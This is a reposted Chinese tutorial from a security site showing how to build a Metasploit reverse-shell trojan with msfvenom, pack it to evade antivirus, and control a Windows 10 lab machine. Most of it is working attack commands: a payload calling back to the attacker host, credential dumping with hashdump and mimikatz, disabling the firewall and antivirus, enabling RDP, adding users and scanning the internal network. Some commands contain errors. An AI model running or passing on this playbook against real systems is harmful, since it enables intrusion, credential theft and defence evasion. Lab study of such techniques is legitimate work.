MSF简单利用win10

admin 2023年1月1日14:48:44安全文章评论9 views2996字阅读9分59秒阅读模式

简介

本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。

实验环境

1、一台kali虚拟机  ip为192.168.110.140

2、一台win10虚拟机

实验步骤

1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lport=4444 -f exe >shell.exe

2、可以利用kali对生成的木马进行加壳操作以达到免杀的效果(UPX压缩壳、Hyperion加密壳等技术)

3、把刚刚生成的exe木马文件传输到我们的win10靶机上

4、在kali上输入msfconsole打开metasploit

5、metasploit配置及监听

use exploit/multi/handler #加载模块set payload windows/meterpreter/reverse_tcp #修改成我们之前生成木马时使用的payloadset lhost 127.0.0.1 #设置kali的IP地址为监听地址set lport 4444 #设置监听端口

以上配置全部配置完成后我们就可以输入run然后开始监听了

MSF简单利用win10

监听好后我们就可以用win10靶机点击我们的木马程序

点击后就连接上我们的kali攻击机了

MSF简单利用win10

之后我们就可以利用metetpreter这个后渗透模块干一些骚操作了

如用webcam打开摄像头等!

MSF后渗透操作

1.获取用户的hash
runpost/windows/gather/smart_hashdump
MSF简单利用win10
2.使用mimikatz获取密码
load mimikatz
MSF简单利用win10
使用creds_all直接获取密码
MSF简单利用win10
kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令
kiwi_cmd sekurlsa::logonpasswords
MSF简单利用win10
3.开启远程桌面
run post/windows/manage/enable_rdp //开启3389 proxychains rdesktop IP //远程连接 目标机需要开启3389端口
MSF简单利用win10
4.关闭防火墙
shell执行:netsh advfirewall set allprofiles state off
5.扫描局域网其他主机
auxiliary/scanner/discovery/arp_sweep #基于arp协议发现内网存活主机,这不能通过代理使用auxiliary/scanner/portscan/ack #基于tcp的ack回复进行端口扫描,默认扫描1-10000端口auxiliary/scanner/portscan/tcp #基于tcp进行端口扫描,默认扫描1-10000端口auxiliary/scanner/discovery/udp_sweep #基于udp协议发现内网存活主机auxiliary/scanner/discovery/udp_probe #基于udp协议发现内网存活主机auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机auxiliary/scanner/ftp/ftp_version #发现内网ftp服务,基于默认21端口auxiliary/scanner/ssh/ssh_version #发现内网ssh服务,基于默认22端口auxiliary/scanner/telnet/telnet_version #发现内网telnet服务,基于默认23端口auxiliary/scanner/dns/dns_amp #发现dns服务,基于默认53端口auxiliary/scanner/http/http_version #发现内网http服务,基于默认80端口auxiliary/scanner/http/title #探测内网http服务的标题auxiliary/scanner/smb/smb_version #发现内网smb服务,基于默认的445端口 use auxiliary/scanner/mssql/mssql_schemadump #发现内网SQLServer服务,基于默认的1433端口use auxiliary/scanner/oracle/oracle_hashdump #发现内网oracle服务,基于默认的1521端口 auxiliary/scanner/mysql/mysql_version #发现内网mysql服务,基于默认3306端口auxiliary/scanner/rdp/rdp_scanner #发现内网RDP服务,基于默认3389端口auxiliary/scanner/redis/redis_server #发现内网Redis服务,基于默认6379端口auxiliary/scanner/db2/db2_version #探测内网的db2服务,基于默认的50000端口auxiliary/scanner/netbios/nbname #探测内网主机的netbios名字
run autoroute -p //查看路由设置run get_local_subnets //查看目标机本地子网情况run autoroute -s 192.168.52.0/24 设置路由
6.自动迁移进程
run post/windows/manage/migrate
MSF简单利用win10
7.查看是否是虚拟机
run post/windows/gather/checkvm
MSF简单利用win10
8.关闭杀毒软件
run post/windows/manage/killav
MSF简单利用win10
9.获取用户登录信息
run post/windows/gather/enum_logged_on_users
MSF简单利用win10
10.获取当前安装的应用程序
run post/windows/gather/enum_applications
MSF简单利用win10
11.获取目标分区情况
run post/windows/gather/forensics/enum_drives
MSF简单利用win10
12.对目标进行漏洞扫描
run post/multi/recon/local_exploit_suggester
MSF简单利用win10
13.收集系统环境信息
run post/multi/gather/env
MSF简单利用win10
14.查看开启的服务
run post/windows/gather/enum_services
MSF简单利用win10
15.查看目标主机最近的操作
run post/windows/gather/dumplinks
MSF简单利用win10
16.对用户的操作
删除用户run post/wndows/manage/delete_user username=aiyou添加账户run post/windows/manage/enable_rdp USERNAME=aiyou PASSWORD=aiyou
17.扫描某个网段存活的主机
use auxiliary/scanner/netbios/nbnameset rhosts 192.168.52.0-255run
MSF简单利用win10
18.扫描端口
use auxiliary/scanner/portscan/tcpset rhosts 192.168.52.138set ports 80,135-139,445,3306,3389run
MSF简单利用win10


原文始发于微信公众号(网络安全学习爱好者):MSF简单利用win10

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月1日14:48:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  MSF简单利用win10 https://cn-sec.com/archives/1491708.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: